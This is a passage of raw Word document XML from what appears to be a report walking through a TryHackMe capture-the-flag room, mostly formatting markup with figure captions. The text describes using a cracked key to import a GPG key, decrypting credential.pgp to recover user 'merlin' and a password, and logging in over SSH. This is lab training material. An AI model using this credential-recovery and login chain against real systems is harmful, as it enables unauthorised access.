          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00776E82">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">key is used in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>passphrase when importing the gpg tryhackme.asc file as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7297B6" w14:textId="77777777" w:rsidR="00776E82" w:rsidRDefault="00776E82" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5B3DBB" w14:textId="0C31E76C" w:rsidR="00752D12" w:rsidRDefault="00776E82" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251550720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7187E04A" wp14:editId="1B544274">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2392268</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1279147</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2090763" cy="157807"/>
                <wp:effectExtent l="0" t="0" r="24130" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="760259234" name="Rectangle 760259234"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2090763" cy="157807"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:no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D62535" id="Rectangle 760259234" o:spid="_x0000_s1026" style="position:absolute;margin-left:188.35pt;margin-top:100.7pt;width:164.65pt;height:12.45pt;z-index:25155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" filled="f" strokecolor="#c00000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251604992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C6EA7DD" wp14:editId="2A4161A8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>217479</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>661310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="706806" cy="237249"/>
                <wp:effectExtent l="0" t="0" r="17145" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="760259233" name="Rectangle 760259233"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="706806" cy="237249"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:no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A372B4" id="Rectangle 760259233" o:spid="_x0000_s1026" style="position:absolute;margin-left:17.1pt;margin-top:52.05pt;width:55.65pt;height:18.7pt;z-index:251604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" filled="f" strokecolor="#c00000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00776E82">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F463257" wp14:editId="1072ACAA">
            <wp:extent cx="5731510" cy="1738630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="760259232" name="Picture 76025923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32" name="Picture 760259232" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1738630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33876FC9" w14:textId="73285F4C" w:rsidR="00776E82" w:rsidRDefault="00776E82" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="_Toc111363674"/>
      <w:bookmarkStart w:id="434" w:name="_Toc111363811"/>
      <w:bookmarkStart w:id="435" w:name="_Toc111981834"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>109</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Use the passphrase to import tryhackme </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNGJiMjM0NzktYzVmNy00OTVlLTk3MzAtMTMzMzFhNDliMDI3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877968759"/>
          <w:placeholder>
            <w:docPart w:val="0A61E21E7CD1410CBD1B21B72B0CE228"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="433"/>
      <w:bookmarkEnd w:id="434"/>
      <w:bookmarkEnd w:id="435"/>
    </w:p>
    <w:p w14:paraId="7C30BC6B" w14:textId="0F35A960" w:rsidR="00752D12" w:rsidRPr="009D0FD1" w:rsidRDefault="00752D12" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5351212D" w14:textId="3A10C3EB" w:rsidR="00776E82" w:rsidRDefault="00776E82" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> displays the successful outcome</w:t>
      </w:r>
      <w:r w:rsidR="000A7CE2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD11F52" w14:textId="65BCFF10" w:rsidR="00752D12" w:rsidRDefault="00752D12" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752D12">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11EFFC49" wp14:editId="02D94F1F">
            <wp:extent cx="5459730" cy="2564506"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="294847934" name="Picture 29484793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847934" name="Picture 294847934" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId127"/>
                    <a:srcRect l="2157" t="5636" r="2551" b="15334"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5461654" cy="2565410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91FD35" w14:textId="5A062D87" w:rsidR="000A7CE2" w:rsidRDefault="000A7CE2" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="_Toc111363675"/>
      <w:bookmarkStart w:id="437" w:name="_Toc111363812"/>
      <w:bookmarkStart w:id="438" w:name="_Toc111981835"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>110</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Successful Import of TryHackMe</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYjdmNzAzYWUtZjZlYi00MzIyLTljY2YtZDFmNmUyZDA3MzE5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1656216116"/>
          <w:placeholder>
            <w:docPart w:val="C83EA514D44441A5A7DD2B40685501E8"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="436"/>
      <w:bookmarkEnd w:id="437"/>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p w14:paraId="55543534" w14:textId="305745CD" w:rsidR="000A7CE2" w:rsidRDefault="000A7CE2" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1D9A19" w14:textId="0EC478BD" w:rsidR="000A7CE2" w:rsidRPr="000A7CE2" w:rsidRDefault="000A7CE2" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This file is then used to decrypt the gpg file using the ‘gpg --decrypt credential.pgp’ command </w:t>
      </w:r>
      <w:r w:rsidR="00226461">
        <w:t xml:space="preserve">and returns the user ‘merlin’ together with its password </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="000930A0">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000930A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C95B440" w14:textId="444C76A5" w:rsidR="00752D12" w:rsidRDefault="000A7CE2" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752D12">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4470790C" wp14:editId="2F0BF608">
            <wp:extent cx="5372718" cy="1759602"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259200" name="Picture 76025920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00" name="Picture 760259200" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId128"/>
                    <a:srcRect l="1725" t="5046" r="4521" b="398"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5373516" cy="1759864"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BEDA8F" w14:textId="44AD93F4" w:rsidR="000A7CE2" w:rsidRDefault="000A7CE2" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="_Toc111363676"/>
      <w:bookmarkStart w:id="440" w:name="_Toc111363813"/>
      <w:bookmarkStart w:id="441" w:name="_Toc111981836"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>111</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Decrypt Credential.pgp</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fY2QyYTI0MDktNzZjNi00NDU3LThkYmEtZjE4YmNhYTY5YmE4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1532608773"/>
          <w:placeholder>
            <w:docPart w:val="50B08E4EF1DA4D46855CF7FA2AB53DEC"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="439"/>
      <w:bookmarkEnd w:id="440"/>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:p w14:paraId="584B8625" w14:textId="64A4F3F8" w:rsidR="000A7CE2" w:rsidRDefault="000A7CE2" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27306E60" w14:textId="3B4A66D0" w:rsidR="00226461" w:rsidRPr="000A7CE2" w:rsidRDefault="00226461" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The user ‘merlin’ and its password are used for the SSH connection as outlined in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A513DF">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A513DF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765AE2D9" w14:textId="5E447C54" w:rsidR="008C2D21" w:rsidRDefault="00C84656" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251568128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04629B3B" wp14:editId="518316BB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>293868</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1082040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2412759" cy="195821"/>
                <wp:effectExtent l="19050" t="19050" r="26035" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="760259236" name="Rectangle 760259236"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2412759" cy="195821"/>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346498" id="Rectangle 760259236" o:spid="_x0000_s1026" style="position:absolute;margin-left:23.15pt;margin-top:85.2pt;width:190pt;height:15.4pt;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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251614208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34A3EB86" wp14:editId="5A8F1968">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4280381</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>909457</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1076393" cy="231518"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="760259235" name="Rectangle 760259235"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1076393" cy="231518"/>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A7C1D0" id="Rectangle 760259235" o:spid="_x0000_s1026" style="position:absolute;margin-left:337.05pt;margin-top:71.6pt;width:84.75pt;height:18.25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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="008C2D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D9DF023" wp14:editId="195E08DD">
            <wp:extent cx="5140410" cy="1280160"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="760259202" name="Picture 76025920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02" name="Picture 760259202" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId129"/>
                    <a:srcRect l="1657" t="7941" r="7672" b="2587"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5143097" cy="1280829"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332C12E" w14:textId="7871CC66" w:rsidR="00226461" w:rsidRDefault="00226461" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="_Toc111363677"/>
      <w:bookmarkStart w:id="443" w:name="_Toc111363814"/>
      <w:bookmarkStart w:id="444" w:name="_Toc111981837"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>112</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: SSH into User 'Merlin'</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
